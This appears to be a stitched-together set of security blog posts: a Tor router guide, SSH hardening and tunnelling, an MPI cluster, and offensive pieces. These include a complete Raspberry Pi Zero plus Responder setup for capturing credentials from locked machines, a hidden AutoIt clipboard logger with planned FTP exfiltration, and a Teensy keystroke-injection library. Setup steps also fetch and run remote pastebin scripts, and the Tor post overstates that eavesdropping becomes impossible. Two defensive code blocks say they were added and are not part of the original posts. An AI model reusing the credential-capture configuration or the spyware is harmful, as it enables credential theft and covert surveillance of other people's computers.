UPDATE: We are selling these Tor Privacy routers

We are selling these #privacy #torbox routers for CA$35 + shipping. Message me if you are interested.
Paypal:    cmaj(at)byteseclabs.com
Bitcoin    156SLTpHjWRkLhkgz8mRNmbbwxuERZ3irY
You can DIY too https://goo.gl/OOw7Ig

User manual

Make a cheap TOR anonymizer

I had a few friends ask if they could buy a cheap travel router that protects their internet activity as they travel around the globe. So my criteria:

  1. Cheap (<$20.00)
  2. Portable (ideally pocket size)

I knew I wanted a little travel router that supports OpenWRT and has enough RAM and storage to install TOR. There were a few routers that I liked, but I went with the NEXX WT3020H. There are a couple of models that look the same; except for the "A" model, all the other ones are the same. Don't get the A model: it does not have enough resources to run LuCI and TOR. Pictures below are of my WT3020H. I purchased mine from Aliexpress.

There are a few getting started articles online that explain how to install OpenWRT on this device and how to install TOR. Everything I have seen so far is incomplete: it either allows DNS leaks or doesn't allow .onion URLs. This is why I wanted to write this post and help anyone else who is trying to do the same. The script is agnostic of the hardware, so it should install on other OpenWRT devices.

Installing OpenWRT Chaos Calmer on the device

Connect your computer to the LAN port on the device and follow along:

$ telnet 192.168.8.1
Trying 192.168.8.1...
Connected to 192.168.8.1.
Escape character is '^]'.

(none) login: nexxadmin
Password: y1n2inc.com0755

BusyBox v1.12.1 (2016-11-14 18:04:51 HKT) built-in shell (ash)
Enter 'help' for a list of built-in commands.

# cd /tmp
# wget http://downloads.openwrt.org/chaos_calmer/15.05/ramips/mt7620/openwrt-15.05-ramips-mt7620-wt3020-8M-squashfs-sysupgrade.bin
Connecting to downloads.openwrt.org (78.24.191.177:80)
openwrt-15.05-ramips 100% |*******************************| 3328k 00:00:00 ETA
# mtd_write -r write openwrt-15.05-ramips-mt7620-wt3020-8M-squashfs-sysupgrade.bin mtd3
Unlocking mtd3 ...
Writing from openwrt-15.05-ramips-mt7620-wt3020-8M-squashfs-sysupgrade.bin to mtd3 ... [e]
# reboot

The device should reboot, and at this point you should be running OpenWRT 15.05. Release and renew your computer's DHCP lease. Ensure you have an IP in the range of 192.168.0.0/24 (probably 192.168.0.100).

$ telnet 192.168.1.1
Trying 192.168.1.1...
Connected to openwrt.lan.
Escape character is '^]'.
=== IMPORTANT ============================
Use 'passwd' to set your login password
this will disable telnet and enable SSH
------------------------------------------

BusyBox v1.23.2 (2016-11-14 03:03:02 CEST) built-in shell (ash)

-----------------------------------------------------
CHAOS CALMER (15.05, r46767)
-----------------------------------------------------
* 1 1/2 oz Gin Shake with a glassful
* 1/4 oz Triple Sec of broken ice and pour
* 3/4 oz Lime Juice unstrained into a goblet.
* 1 1/2 oz Orange Juice
* 1 tsp. Grenadine Syrup
-----------------------------------------------------
[email protected]:/# passwd
Changing password for root
New password: 
Retype password: 
Password for root changed by root
[email protected]:/#

Installing TOR and configuring iptables

SSH in to your device and complete the steps below:

$ ssh [email protected]
$ wget http://pastebin.com/raw/Yd5mXksr
$ mv Yd5mXksr setup.sh
$ sh ./setup.sh 
$ reboot

After the device reboots, log in to LuCI (http://192.168.1.1).

  1. Browse to Network -> Interfaces
  2. Click the "Edit" button for "LAN"
  3. Scroll down to the "DHCP Server" section and click on "Advanced Settings"
  4. Add the entry "6,1.2.3.4" (without the quotes) to "DHCP-Options"
  5. Click Save and Apply (may take a couple of minutes)
  6. Reboot the router.

That's all. The device will now intercept any TCP traffic and UDP DNS traffic on the LAN interface and route it through TOR, making eavesdropping impossible.

Please let me know what your thoughts are and if you have any questions. The script will be on http://pastebin.com/Yd5mXksr. Spend the $20, stay secure :)

Snagging creds from locked machines with RaspberryPi Zero

I get really excited anytime I get to use my RaspberryPi Zero. When I saw Rob Fuller's (@mubix) tweet this morning I got really excited. Coincidentally, I have a thing for single board computers and have been playing with the USB Gadget mode for the Pi Zero for the last couple of weeks. As soon as I saw the tweet I knew I had to do this with the Pi Zero.

Requirements:

  1. RaspberryPi Zero
  2. 4GB or larger Micro SD Card
  3. OTG USB Cable
  4. USB Ethernet adapter or WiFi Dongle (initial setup)

I am going to assume that the reader knows how to flash an image onto the SD Card. I went with the Raspbian-lite version; it's better with RAM utilization on the Pi. Boot up the Raspberry Pi Zero and install the software required:

sudo apt-get install -y python git python-pip python-dev screen sqlite3 isc-dhcp-server
sudo pip install pycrypto
sudo su
cd ~/
git clone https://github.com/spiderlabs/responder

Edit /etc/network/interfaces

Open /etc/network/interfaces with your favorite text editor and add the following to it:

auto usb0
allow-hotplug usb0
iface usb0 inet static
address 192.168.2.201
netmask 255.255.255.0
gateway 192.168.2.1

Configure DHCPD Settings: /etc/dhcp/dhcpd.conf

Edit /etc/dhcp/dhcpd.conf and replace the contents with the text below:

ddns-update-style none;
option domain-name "domain.local";
option domain-name-servers 192.168.2.201;
default-lease-time 60;
max-lease-time 72;
# If this DHCP server is the official DHCP server for the local
# network, the authoritative directive should be uncommented.
authoritative;
# Use this to send dhcp log messages to a different log file (you also
# have to hack syslog.conf to complete the redirection).
log-facility local7;
# wpad
option local-proxy-config code 252 = text;
# A slightly different configuration for an internal subnet.
subnet 192.168.2.0 netmask 255.255.255.0 {
range 192.168.2.1 192.168.2.2;
option routers 192.168.2.201;
option local-proxy-config "http://192.168.2.201/wpad.dat";
}

Edit /etc/rc.local

Edit /etc/rc.local and add the following before exit 0:

# Clear leases
rm -f /var/lib/dhcp/dhcpd.leases
touch /var/lib/dhcp/dhcpd.leases
# Start DHCP server
/usr/sbin/dhcpd
# Start Responder
/usr/bin/screen -dmS responder bash -c 'cd /root/responder/; python Responder.py -I usb0 -f -w -r -d -F'

Create the configuration file for screen

As root (sudo su), open ~/.screenrc with nano and add this:

# Logging
deflog on
logfile /root/logs/screenlog_$USER_.%H.%n.%Y%m%d-%0c:%s.%t.log

Once the above steps are completed, shut down the Pi Zero (shutdown -h now) and remove the Micro SD Card. Connect the Micro SD card to your computer. We need to modify config.txt and cmdline.txt to turn the OTG port into a virtual Ethernet port. Please ensure that you are running a version of Raspbian released after May 2016.

Edit config.txt

Add this after the last line:

dtoverlay=dwc2

Edit cmdline.txt

After rootwait (the last word on the first line) add a space and then:

modules-load=dwc2,g_ether

 

Safely eject the Micro SD Card and put it back in the Pi Zero. The device is ready: use the USB OTG cable to connect it to the PC, and Happy Hacking!
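From the defender's side, the lease handed out by the dhcpd.conf above has a recognizable shape: a proxy auto-config URL in option 252, with the DHCP server, router, DNS server and WPAD host all being one address, and a lease of about a minute. The following is an added example, not part of the original post, that parses a DHCP option field and flags that shape; the 300 second lease threshold, the function names and both sample option blobs are assumptions constructed for illustration.

```python
# Added example: flag DHCP offers shaped like the dhcpd.conf above.
import ipaddress
import struct
from urllib.parse import urlparse

# Option codes from RFC 2132; 252 is the private-use code used for WPAD.
PAD, ROUTER, DNS, LEASE, SERVER_ID, WPAD, END = 0, 3, 6, 51, 54, 252, 255


def parse_options(blob):
    """Parse the code/length/value option field of a DHCP message."""
    opts, i = {}, 0
    while i < len(blob):
        code = blob[i]
        if code == END:
            break
        if code == PAD:
            i += 1
            continue
        if i + 1 >= len(blob):
            raise ValueError("truncated option header")
        length = blob[i + 1]
        value = blob[i + 2:i + 2 + length]
        if len(value) != length:
            raise ValueError("option %d is truncated" % code)
        opts[code] = opts.get(code, b"") + value  # split options are concatenated
        i += 2 + length
    return opts


def addresses(raw):
    """Decode a packed list of IPv4 addresses."""
    return [str(ipaddress.IPv4Address(raw[j:j + 4])) for j in range(0, len(raw) - 3, 4)]


def assess_offer(blob, short_lease=300):
    """Return findings for one offer. short_lease (seconds) is an assumed threshold."""
    opts = parse_options(blob)
    findings = []
    server = (addresses(opts.get(SERVER_ID, b"")) or [None])[0]
    if WPAD in opts:
        url = opts[WPAD].rstrip(b"\x00").decode("ascii", "replace")
        findings.append("proxy auto-config URL pushed via option 252: " + url)
        if server and urlparse(url).hostname == server:
            findings.append("WPAD host is the DHCP server itself")
    if server and addresses(opts.get(ROUTER, b"")) == [server] \
            and addresses(opts.get(DNS, b"")) == [server]:
        findings.append("DHCP server, router and DNS are one host: " + server)
    if len(opts.get(LEASE, b"")) == 4:
        lease = struct.unpack("!I", opts[LEASE])[0]
        if lease <= short_lease:
            findings.append("very short lease: %d s" % lease)
    return findings


def _opt(code, value):
    return bytes([code, len(value)]) + value


def _ip(text):
    return ipaddress.IPv4Address(text).packed


# Constructed sample: the options the dhcpd.conf above would hand to a client.
SUSPECT = (_opt(SERVER_ID, _ip("192.168.2.201")) + _opt(LEASE, struct.pack("!I", 60))
           + _opt(ROUTER, _ip("192.168.2.201")) + _opt(DNS, _ip("192.168.2.201"))
           + _opt(WPAD, b"http://192.168.2.201/wpad.dat") + bytes([END]))

# Constructed sample: an ordinary home-router lease for comparison.
BENIGN = (_opt(SERVER_ID, _ip("10.0.0.1")) + _opt(LEASE, struct.pack("!I", 86400))
          + _opt(ROUTER, _ip("10.0.0.1")) + _opt(DNS, _ip("10.0.0.53")) + bytes([END]))

if __name__ == "__main__":
    for name, sample in (("suspect", SUSPECT), ("benign", BENIGN)):
        print(name, assess_offer(sample))
```

The option bytes can come from a packet capture of the offer or from the DHCP client's lease record on the workstation.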

TOP 5: Personal Security Tips

I have been working in a Systems Administrator role for over 10 years, and I am constantly asked by home users and peers at work how to secure infrastructure and how to monitor it effectively. One of the biggest issues with securing infrastructure is identifying potential attack vectors and running risk analysis scenarios. Unfortunately, this also means understanding who is trying to attack you or your business and what's in it for them.

I would like to start off with securing your personal infrastructure, and later show how this ties in with securing your business. The biggest reason for personal attacks is identity theft. Let's face it, money is the biggest motivation for this industry. Building a botnet or zombie network is another reason why evildoers want to have control over your system(s). They want your compute power and they need your bandwidth to launch DDoS attacks against services. In the world we live in, these types of attacks are orchestrated by two distinct groups:

  1. Identity Theft ==> Organized crime syndicates, family and friends
  2. Botnet ==> Spammers, hacktivists, script kiddies and organized crime syndicates

Now that we have identified the two most common types of personal attacks, let's see what we can do to secure ourselves. I should point out a couple of things before we get to the nitty gritty of things:

  1. Paranoia is good. The consensus among people like us is to keep an open mind but question everything.
  2. If you make it difficult for attackers, they will quickly move along to the next unsuspecting victim.

Now that I got this off my chest, let's see what we can do in our personal lives to stay secure. I titled this article "TOP 5" so I will highlight the top five tips for personal security:

  1. Do not use the same password everywhere. Use different passwords for every service you use online, your home WiFi, your email, your password to log in to your computer, etc. Do not use simple passwords, passwords of less than 8 characters, or dictionary words. Instead use complex 9+ character passwords with numbers, upper and lower case characters, and special characters like ,!@# etc. Try to use 2 factor authentication for services that offer it (Google, Facebook, Microsoft, Twitter, and many more). If you are thinking this is insane and wondering how you can memorize such passwords, you are thinking along the right path. Passwords that are easy to remember are easy to hack. Instead, use an application like Keepass or Password Safe to track your passwords. Keepass works on Windows, Linux, Mac OS and smartphones, and I use it for storing my passwords.
  2. Do not use pirated software. The issue with pirated software is that almost 99.9999% of the time the software is tampered with to allow you to use it by bypassing the activation / security in place to prevent unauthorized usage. What you almost never know is what was actually changed. We notice that applications downloaded from shady websites may include malware that installs along with the software, giving the attacker persistent access to your system. We have noticed this trend in the industry over and over again: rootkits embedded in applications downloaded from torrents. Here is a link for such an attack from 2011 to show that this is not a new trend. Another issue with cracked software is that it cannot be updated, leaving you stuck with an old, vulnerable version and tempting fate.
  3. Regularly update your system and run a good antivirus software. Enterprises patch vulnerabilities in their systems. This is a cyclical process, and patches are created as vulnerabilities are discovered. The problem with running old software is that there is a very good chance that your system has a vulnerability and that there is an active exploit out there that is being used by evildoers to gain access. If you like to wait before patching, prioritizing what to patch is a good idea too. Web browsers and plugins (Flash, Java, Acrobat Reader) are usually the most attacked software. If you like visiting questionable sites, or get emails from unknown people with attachments, use a sandboxed environment for your day to day stuff. Sandboxie is a great application that does this. If you use a professional antivirus solution, like Avast, it comes with this option built in. Also, please keep your firewall turned on. Firewalls were designed for a good reason, and they act as the first line of defense against online threats.
  4. Backup your systems regularly. We are starting to see an increasing growth of "Ransom Ware".  This is a new type of malware that holds your personal data hostage, and unless you pay, they won't provide you with the keys to decrypt your data. If you have regular backups, then you can easily restore the data from the backup. Both Windows and Mac OS have great backup solutions that are baked into the operating system for free. This way, if you have hardware damage and/or malware destroys your files, you can get your data back without breaking a sweat or your bank account. If you prefer to get a 3rd party solution for backup, there are professional solutions from companies like Acronis that can provide reliable solutions.
  5. If you've implemented points 1-4, you are already doing a good job of staying secure. Just don't get social engineered and give up your data to strangers. This is one of the most important issues with security: the human factor. Be careful of what you post on social media, and be careful of what information you give out to people. If you tell everyone that your first pet's name was "fluffy" and the security question for your favorite mail service is "What is your first pet's name?", then it does not matter how secure your password is; it will be easy to reset it and take over your email account. This also means that if this email was used to sign up for other services, those services are then getting owned by the attacker. I will leave this tip up to your imagination, but this is why paranoia is a good friend. Question everything and be very careful about the information you give out freely. I want to add: avoid using open WiFi, or at least use a VPN connection when surfing from an open WiFi hotspot.

 Please let me know what you think in the comments below. If you disagree, I would love to see some feedback and constructive criticism as I prepare for the TOP 5: Enterprise Security Tips.

8 Node +1 Master: RaspberryPi Cluster running MPI and crunching numbers...

My quest for learning and building parallelism turned a new page. I mustered the courage to build a Raspberry Pi MPI cluster to test and code MPI. A couple of my friends at the University of Alberta have been running MPI based code to crunch fluid dynamics problems. My goal was to build a farm of CPUs I can dedicate to do #STUFF at a very cheap price point.
 

Objectives:

 

  1. Has to be affordable
  2. Has to look presentable

Parts List:


 

  1. 9 x Raspberry Pi from www.element14.com
  2. 9 x 8GB Class 10 SD Cards (local computer store)
  3. 5V 12A, 60W PSU
  4. 18 x Female to Female jumper cables
  5. 18 x header pins
  6. 1 x PCB, 1 x 440uF capacitor, 1 x 220 & 1 x LED
  7. 16 Port 10/100 MB switch (had one available)
  8. 10 x CAT 5 patch cables


I used my 3D printer to print these frames I found on Thingiverse.


I used PLA and the finished product looked quite nice. It took about 2 hours to print 4 frames. After about 5 hours I had the bottom and the top pieces printed. I also started installing Raspbian on the 9 SD cards. I used Win32DiskImager on a Windows 7 machine to create the SD cards. I started inserting the Pis into the bottom pieces and then realized the biggest issue with this concept would be delivering power to the Pis. So I decided to build my own. The Pis draw about 450mA - 550mA depending on CPU load. With 9 of them I needed a PSU that can provide at least 5.5 A to be safe. I soon realized that when these Pis power on they can draw up to 700mA. So I purchased a 5V 12A switching PSU from my local store and built a simple power distribution circuit.


The DIP switches can turn the Pis on or off. The main purpose of the 220uF capacitor is to smooth out the voltage; it is probably not required. The red LED tells me that the PSU is on and supplying power. I built 2 of these, as I was trying out a couple of different designs. Then I used the female jumpers to power the Pis.


Once the Pis were powered up I SSHed into them and used "sudo raspi-config" to configure the CPU to run at 800MHz, set the GPU RAM to 16MB and expand the image to utilize the full 8GB. I could feel my goal getting close to completion with every key stroke. I wrote a little shell script to automate the MPI installation and configuration. It's not 100% automated but close enough:


# Bring the system up to date and install the Fortran compiler
sudo apt-get update && sudo apt-get upgrade -y
sudo apt-get install gfortran -y
# Download and build MPICH2 from source
mkdir mpi_install
cd mpi_install
wget http://www.mcs.anl.gov/research/projects/mpich2/downloads/tarballs/1.4.1p1/mpich2-1.4.1p1.tar.gz
tar xfz mpich2-1.4.1p1.tar.gz
cd mpich2-1.4.1p1
./configure && make && sudo make install
# Fetch and run the interactive install.py helper
echo "Please answer the following questions to continue:"
wget https://github.com/downloads/philleonard/MPICH2-Armel-Raspberry-Pi/install.py
sudo python install.py

And that was it. My MPI cluster was ready. Since then I have run several example codes. Yes, including calculating the digits of pi.


I will post more with code examples and a performance review as soon as I get some more time. Till then, Happy Hacking.

Source: http://asysadminsblog.blogspot.com

Secure SSH with 2 Factor Authentication

Disclaimer:

  1. This article applies to Debian based Linux and Ubuntu variants
  2. Does not work if the user's home drive is encrypted

Getting started:

I will be demonstrating how to use the Google Authenticator PAM module for 2 factor authentication. Google uses a time based OTP algorithm and it does not phone home to work. You will need an Android or iOS device with the Google Authenticator app installed.

Install the Google authentication module by opening terminal and typing in:

sudo apt-get install libpam-google-authenticator

Generate an authentication key by running this command:

google-authenticator

Follow the instructions to generate a key by pressing "y". Copy the secret key, the verification code and the scratch codes and store them securely. Scan the bar code with the app on your phone to initialize it. Please note that at this point we have only installed the module and generated a key. We still have to enable the PAM module for SSH login manually. The steps below update the "pam.d" config file to use "pam_google_authenticator.so", set "ChallengeResponseAuthentication yes" in "sshd_config", and then restart the SSH service.

Open /etc/pam.d/sshd with vi or nano:

sudo nano /etc/pam.d/sshd

and add the line:

auth required pam_google_authenticator.so

Open sshd_config, locate the ChallengeResponseAuthentication line, and edit it to say:

sudo nano /etc/ssh/sshd_config
ChallengeResponseAuthentication yes

Restart SSH service:

sudo service ssh restart

Next time you SSH in you will be prompted for your password and the OTP before you are authenticated.

SSH Tunnelling & Secure Browsing: Part III

This time I will go over setting up the SSH client in Linux, setting up key pairs and how to implement keys for authentication in Linux and in Windows.

Setting up tunnelling in Linux is as easy as typing in:

ssh -D 8080 [username]@[server name]

SSH Tunnelling & Secure Browsing: Part II

If you have completed Part I, you should have a running SSH server ready to tunnel all your needs. If you are on a PC running Microsoft's Windows operating system like me, download PuTTY 0.62-installer.exe from http://the.earth.li/~sgtatham/putty/latest/x86/putty-0.62-installer.exe and install it. PuTTY will be our SSH client and we are going to cover:

  1. Password Authentication
  2. Asymmetric Key based authentication (RSA)

The second method is the most secure if implemented properly. Once PuTTY is installed it should have created an icon on your desktop. Open PuTTY and you will see the screen below:

Default PuTTY Screen

Fill in the fields as necessary:

  • Host Name: [username]@[server name]|[IP address]
  • Port: The default port is 22 ***
  • Connection type: SSH
  • Saved Sessions: [Any name of your liking]

Once this information is filled in click on "Connection" > expand "SSH" > "Tunnels" and fill the tunnel information.

Tunnel Configuration

Click Add when done. On the menu to the left, scroll all the way up and click "Session", and then click "Save" to save changes to the configuration. Click "Open" to launch the connection. PuTTY will prompt that the key is not recognized if this is the first time you are connecting. Click Yes to save the key in the registry. I will go over key verification in another post. You will be prompted for your password at this stage. Please type it to complete the process. Once in, open your browser of choice and change the proxy settings to SOCKSv5 Server / IP = 127.0.0.1, Port: 8090, and you will be tunneling traffic like 1337.

Part III will cover setting up the SSH client in Linux and Public / Private key based encryption in Linux and Windows. Hope you enjoyed, please comment below.

SSH Tunnelling & Secure Browsing: Part I

Checking your Facebook page from Starbucks? Checked your banking information from the Hotel WiFi? Or are you going to Defcon this year? 

Public internet is not secure and there is a need for secure browsing. There are many ways to achieve this, obfuscate the traffic for eavesdroppers and protect ourselves against Man In The Middle (MITM) attacks. After trying a few different solutions like torProject, Hotspot Shield and a few others like it, I decided to set up my own SSH server so that I can create a secure tunnel between my laptop and the SSH server and use that as a SOCKSv5 proxy. If you are still interested, I will try to cover the following topics over the next few days:
  1. Install and configure a SSH Server (FreeBSD 9.0)
  2. Create users.
  3. Secure and harden the server.
  4. Configure SSH client (PuTTY) in windows
  5. Create Public and Private keys for authentication
  6. Set up Password-less login.
I wanted to point out that FreeBSD is really stable, uses very few resources to run and is my server of choice. I have tested the same with Debian 6.0.4 and it works just as well. All the steps I am about to show should be easy to replicate on all *NIX type systems. I also wanted to point out that a Virtual Private Server will give you the best performance over hosting the SSH server at home.
Server Specs:

Installation Steps:

  1. Create the Guest Machine Guest VM Configuration
  2. Save and Power On. VM should boot from DVD press Enter to continue.
  3. Play this video for actual installation step

Configuration Steps:

  • Create a new user by typing "adduser" then Enter. P.S. add the user to the "wheel" group so that the user can invoke "su -"

FreeBSD Account Setup

  •  Login as the newly created user
  • mkdir ~/.ssh
  • chmod 700 .ssh
  • su -
  • Enter root password
  • cp /etc/ssh/sshd_config ~/sshd_config.orig
  • cd /home/n3onli8
  • cp /etc/ssh/sshd_config /home/n3onli8/sshd_config
  • vi sshd_config
  • I configured it to look like:

Protocol 2
HostKey /etc/ssh/ssh_host_rsa_key
HostKey /etc/ssh/ssh_host_dsa_key
KeyRegenerationInterval 1h
ServerKeyBits 1024
LoginGraceTime 2m
PermitRootLogin no
#StrictModes yes
PubkeyAuthentication yes
AuthorizedKeysFile    %h/.ssh/authorized_keys
# Change to NO to enable built-in password authentication.
PasswordAuthentication yes
PermitEmptyPasswords no
UsePAM no
AllowAgentForwarding yes
AllowTcpForwarding yes
GatewayPorts yes
X11Forwarding yes
X11DisplayOffset 10
X11UseLocalhost yes
PrintLastLog yes
TCPKeepAlive yes
PermitTunnel yes
# override default of no subsystems
Subsystem    sftp    /usr/libexec/sftp-server

  • Quit and Write changes
  • rm /etc/ssh/sshd_config
  • mv /home/n3onli8/sshd_config  /etc/ssh/sshd_config
  • /etc/rc.d/sshd restart
  • exit (exit su)

man ssh for better understanding of sshd_config
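The sshd_config above enables more than a SOCKS proxy needs, and "secure and harden the server" is on this series' topic list. The following is an added example, not part of the original post, that audits a config the way sshd reads it (keywords are case-insensitive and the first value for a keyword wins) and runs it over the config shown above. The baseline is an assumption of this example for a host used only for `ssh -D` with key logins already working; all function names are hypothetical.

```python
# Added example: audit an sshd_config against a least-privilege baseline.

# The configuration from the post above, one directive per line.
PAGE_CONFIG = """\
Protocol 2
HostKey /etc/ssh/ssh_host_rsa_key
HostKey /etc/ssh/ssh_host_dsa_key
KeyRegenerationInterval 1h
ServerKeyBits 1024
LoginGraceTime 2m
PermitRootLogin no
#StrictModes yes
PubkeyAuthentication yes
AuthorizedKeysFile    %h/.ssh/authorized_keys
PasswordAuthentication yes
PermitEmptyPasswords no
UsePAM no
AllowAgentForwarding yes
AllowTcpForwarding yes
GatewayPorts yes
X11Forwarding yes
X11DisplayOffset 10
X11UseLocalhost yes
PrintLastLog yes
TCPKeepAlive yes
PermitTunnel yes
Subsystem    sftp    /usr/libexec/sftp-server
"""

# Assumed baseline: a SOCKS-only host. Only switch PasswordAuthentication off
# after key login has been tested, or you lock yourself out.
BASELINE = {
    "permitrootlogin": "no",
    "passwordauthentication": "no",
    "permitemptypasswords": "no",
    "gatewayports": "no",
    "x11forwarding": "no",
    "allowagentforwarding": "no",
    "permittunnel": "no",
}
PROTOCOL1_ONLY = ("keyregenerationinterval", "serverkeybits")
MULTI_VALUE = ("hostkey", "subsystem", "listenaddress", "port", "acceptenv")


def effective_settings(text):
    """Return (settings, shadowed): the global values sshd uses, and later duplicates."""
    settings, shadowed = {}, []
    for number, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        keyword = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        if keyword == "match":
            break  # conditional blocks follow; only the global section is audited
        if keyword in MULTI_VALUE:
            settings.setdefault(keyword, []).append(value)
        elif keyword in settings:
            shadowed.append((number, keyword, value))
        else:
            settings[keyword] = value
    return settings, shadowed


def audit(text):
    """Return a list of (keyword, value, reason) findings."""
    settings, shadowed = effective_settings(text)
    findings = []
    for keyword, wanted in BASELINE.items():
        actual = settings.get(keyword)
        if actual is None:
            findings.append((keyword, "not set", "default applies; set it explicitly"))
        elif actual.lower() != wanted:
            findings.append((keyword, actual, "baseline is " + wanted))
    for keyword in PROTOCOL1_ONLY:
        if keyword in settings:
            findings.append((keyword, settings[keyword], "SSH protocol 1 option"))
    for path in settings.get("hostkey", []):
        if "dsa" in path and "ecdsa" not in path:
            findings.append(("hostkey", path, "DSA host key"))
    for number, keyword, value in shadowed:
        findings.append((keyword, value, "line %d ignored; first value wins" % number))
    return findings


if __name__ == "__main__":
    for finding in audit(PAGE_CONFIG):
        print("%-24s %-34s %s" % finding)
```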

Part II will cover setting up putty in MS Windows

Thanks for reading. Comment below

Autoit: Clipboard Logger

This code will create an executable of approximately 300KB that will run on your computer, logging clipboard data to a text file at %USERPROFILE%\ClipLog.log
  1. Download Autoit from http://www.autoitscript.com/site/
  2. Open SciTE
  3. Copy the code from below and paste it in SciTE
  4. Save the file and hit F5 to test the script
  5. Browse to %USERPROFILE%
  6. Open ClipLog.log to view logged clip board text.
  7. If it's all good then Ctrl + Break to stop the script
  8. Then Ctrl + F7 to compile the program into a .EXE
Stuff for version 2.0
  • Copy Log to ftp
  • Auto start program on power on.
  • encrypt the data in the log to hide the information.
; Clippy.au3
; n3onli8, 22, 12, 2011
; Version 1.0

#NoTrayIcon
#include <File.au3>
#include <Clipboard.au3>

; Last clipboard text written to the log, used to skip duplicates
Global $txtClipboard = ""

While 1
    $Clippy = _ClipBoard_GetData()
    ; _ClipBoard_GetData() returns 0 on failure
    If $Clippy <> "0" Then
        If $Clippy <> $txtClipboard Then
            _FileWriteLog(@UserProfileDir & "\ClipLog.log", $Clippy)
        EndIf
    EndIf
    $txtClipboard = $Clippy
    Sleep(100)
WEnd
Exit

Enjoy, Comment below.

<< iPrank >> Teensy ++

Enjoy Demo of n3onli8.h: http://pastebin.com/7dhjJdfN

#include <n3onli8.h>

void AltF(){
   Keyboard.set_modifier(MODIFIERKEY_ALT);
   Keyboard.send_now();
   Keyboard.set_key1(KEY_F);
   Keyboard.send_now();
   delay(200);
   Keyboard.set_modifier(0);
   Keyboard.set_key1(0);
   Keyboard.send_now();
   delay(200);
}

void setup(){
  Serial.begin(9600);
  delay(2500);
  Minimize();
  delay(200);
  PrintScreen();
  delay(200);
  Menu();
  delay(500);
  Keyboard.print("V");
  delay(200);
  Keyboard.print("D");
  delay(200);
  StartRUN();
  delay(500);
  Keyboard.print("mspaint.exe");
  delay(200);
  Enter();
  delay(350);
  Paste();
  delay(200);
  Save();
  delay(200);
  Keyboard.print("%USERPROFILE%\\h4ck.bmp");
  delay(200);
  Enter();
  delay(500);
  AltF();
  delay(100);
  Keyboard.print("K");
  delay(100);
  Keyboard.print("F");
  delay(100);
  AltF4();
  delay(200);
  Minimize(); //Restoring Windows GUI+D
}

void loop(){
}

n3onli8.h Advanced PHUKD Library Complete

Finally completed building the n3onli8.h Teensy library for HID attacks. I want to call this version 0.1 since I have big plans for this library. Hope you guys enjoy:

/*********************n3onli8.h**************************/

#ifndef N3ONLI8_H_INCLUDED
#define N3ONLI8_H_INCLUDED

#include "WProgram.h"

void CtrlAltDel();
void StartRUN();
void Enter();
void PrintScreen();
void Minimize();
void Menu();
void AltF4();
void Paste();
void Save();

#endif
/*******************************************************/
//http://pastebin.com/haVm6smL

/************************n3onli8.cpp**********************/

#include "WProgram.h"
#include "usb_private.h"
#include "usb_api.h"
#include "n3onli8.h"

void CtrlAltDel()
{
  Keyboard.set_modifier(MODIFIERKEY_CTRL);
  Keyboard.send_now();
  Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_ALT);
  Keyboard.send_now();
  Keyboard.set_key1(KEY_DELETE);
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(1500);
}

void StartRUN()
{
    Keyboard.set_modifier(MODIFIERKEY_GUI);
    Keyboard.send_now();
    Keyboard.set_key1(KEY_R);
    Keyboard.send_now();
    delay(1500);
 
    Keyboard.set_modifier(0);
    Keyboard.set_key1(0);
    Keyboard.send_now();  
    Keyboard.set_key1(KEY_BACKSPACE);
    Keyboard.send_now();
    delay(100);

    Keyboard.set_modifier(0);
    Keyboard.set_key1(0);
    Keyboard.send_now();
    delay(100);
}

void Enter()
{
    Keyboard.set_key1(KEY_ENTER);
    Keyboard.send_now();
    Keyboard.set_key1(0);
    Keyboard.send_now();
}

void PrintScreen()
{
    Keyboard.set_key1(KEY_PRINTSCREEN);
    Keyboard.send_now();
    Keyboard.set_key1(0);
    Keyboard.send_now();
}

void Minimize()
{
    Keyboard.set_modifier(MODIFIERKEY_GUI);
    Keyboard.send_now();
    Keyboard.set_key1(KEY_D);
    Keyboard.send_now();
    delay(300);

    Keyboard.set_modifier(0);
    Keyboard.set_key1(0);
    Keyboard.send_now();
    delay(200);
}

void Menu()
{
    Mouse.set_buttons(0, 0, 1);
    Mouse.set_buttons(0, 0, 0);
}

void AltF4()
{
    Keyboard.set_modifier(MODIFIERKEY_ALT);
    Keyboard.send_now();
    Keyboard.set_key1(KEY_F4);
    Keyboard.send_now();
    delay(200);

    Keyboard.set_modifier(0);
    Keyboard.set_key1(0);
    Keyboard.send_now();
    delay(200);
}

void Paste(){
    Keyboard.set_modifier(MODIFIERKEY_CTRL);
    Keyboard.set_key1(KEY_V);
    Keyboard.send_now();
    delay(200);
    Keyboard.set_modifier(0);
    Keyboard.set_key1(0);
    Keyboard.send_now();
    delay(200);
}

void Save(){
    Keyboard.set_modifier(MODIFIERKEY_CTRL);
    Keyboard.set_key1(KEY_S);
    Keyboard.send_now();
    delay(200);
    Keyboard.set_modifier(0);
    Keyboard.set_key1(0);
    Keyboard.send_now();
    delay(200);
}
/**********************************************************/
//http://pastebin.com/YKPc6pgK

Save the 2 files in a folder called n3onli8.h and copy the folder in your Arduino\Libraries folder.
Remember >> Great Power Great responsibilities...
Cheers !!!

Other people that deserve my gratitude for HID hacking...

I have been researching online for other people who have been working along the lines of using a teensy or a similar HID device as a penetration testing tool. Check out these fellows:
  • Adrian Crenshaw at irongeek.com, has done some amazing work on the teensy platform. Had I been at Defcon 18, I would have known that he started this project back in 2010. Check out this page for information on his research and the Programmable HID USB Keystroke Dongle (PHUKD) Library.
  • Darren Kitchen from Hak5.org has been working on a project he likes to call the USB Rubber Ducky. Check out their forum to find out more.

Creating the attack Library... "n3onli8.h"

#include "WProgram.h"
#include "usb_private.h"
#include "usb_api.h"
#include "n3onli8.h"

void CtrlAltDel()
{
    Keyboard.set_modifier(MODIFIERKEY_CTRL);
    Keyboard.send_now();
    Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_ALT);
    Keyboard.send_now();
    Keyboard.set_key1(KEY_DELETE);
    Keyboard.send_now();
    Keyboard.set_modifier(0);
    Keyboard.set_key1(0);
    Keyboard.send_now();
    delay(1500);
}

void StartRUN()
{
    Keyboard.set_modifier(MODIFIERKEY_GUI);
    Keyboard.send_now();
    Keyboard.set_key1(KEY_R);
    Keyboard.send_now();
    delay(1500);

